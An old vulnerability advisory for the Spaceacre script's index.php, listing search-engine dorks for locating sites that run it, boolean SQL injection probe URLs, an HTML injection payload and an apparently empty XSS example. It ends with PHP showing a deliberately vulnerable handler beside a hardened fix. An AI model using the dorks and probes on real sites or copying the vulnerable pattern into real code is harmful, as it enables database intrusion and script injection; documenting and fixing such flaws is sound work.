
# Title : Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability
# Published : 2010-05-26
# Author : CoBRa_21


-------------------------------------------------------------------------------------------

Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://www.spaceacre.com

Dork 1: inurl:cat1.php?catID= "Spaceacre"

Dork 2: intext:"Designed by Spaceacre"

-------------------------------------------------------------------------------------------

SQL Injection:

http://localhost/[path]/index.php?catID=1 and 1=2
http://localhost/[path]/index.php?catID=1 and 1=1

-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML İNJ.

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?catID=index.php?catID= XSS İNJ.

-------------------------------------------------------------------------------------------
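The SQL, HTML and XSS findings above share one root cause: the catID value from the query string is used as-is, both inside the SQL statement (so "1 and 1=2" versus "1 and 1=1" changes the result set) and inside the generated page (so markup in the parameter is rendered by the browser). The following is an added illustration and not Spaceacre's code; the table name categories, the column name, and the use of mysqli with mysqlnd (needed for get_result()) are assumptions. It shows the vulnerable pattern next to a hardened version that validates the type, binds the parameter and encodes on output.

```php
<?php
// Added illustration (not the Spaceacre script itself). Assumed schema:
// table `categories` with integer column `catID` and text column `name`.

// VULNERABLE PATTERN: catID is concatenated into the query and echoed into
// the HTML untouched. "catID=1 and 1=2" / "catID=1 and 1=1" alter the WHERE
// clause (boolean-based SQL injection); "catID=<font ...>" or a <script> tag
// is written back verbatim (HTML / XSS injection).
function render_category_vulnerable(mysqli $db, array $get): string
{
    $catID  = $get['catID'];
    $result = $db->query("SELECT name FROM categories WHERE catID = " . $catID);
    $row    = $result ? $result->fetch_assoc() : null;
    return "<h1>Category " . $catID . "</h1><p>" . ($row['name'] ?? '') . "</p>";
}

// HARDENED PATTERN: type validation, parameter binding, output encoding.
function render_category_hardened(mysqli $db, array $get): string
{
    // catID is an integer identifier: reject anything else before it can
    // reach SQL or HTML. "1 and 1=1" and "<font ...>" both fail here.
    $catID = filter_var(
        $get['catID'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($catID === false) {
        http_response_code(400);
        return '<p>Invalid category.</p>';
    }

    // Prepared statement: the value is bound as data, never spliced into
    // the query text, so it cannot change the statement's structure.
    $stmt = $db->prepare('SELECT name FROM categories WHERE catID = ?');
    $stmt->bind_param('i', $catID);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() assumes mysqlnd
    $stmt->close();

    // Output encoding: everything placed in the page is HTML-escaped, so any
    // markup that reaches this point is displayed as text, not interpreted.
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h1>Category ' . $h((string) $catID) . '</h1><p>'
         . $h($row['name'] ?? '') . '</p>';
}

// Example wiring for an index.php entry point (assumed connection details):
// $db = new mysqli('localhost', 'user', 'pass', 'shop');
// echo render_category_hardened($db, $_GET);
```

With the hardened handler in place, the two boolean probe URLs listed under "SQL Injection" both answer with HTTP 400 instead of returning different pages, and the HTML and XSS probes no longer render their markup. The integer check alone would stop the specific requests on this page, but the prepared statement and output encoding are what make the fix hold for parameters that legitimately carry text.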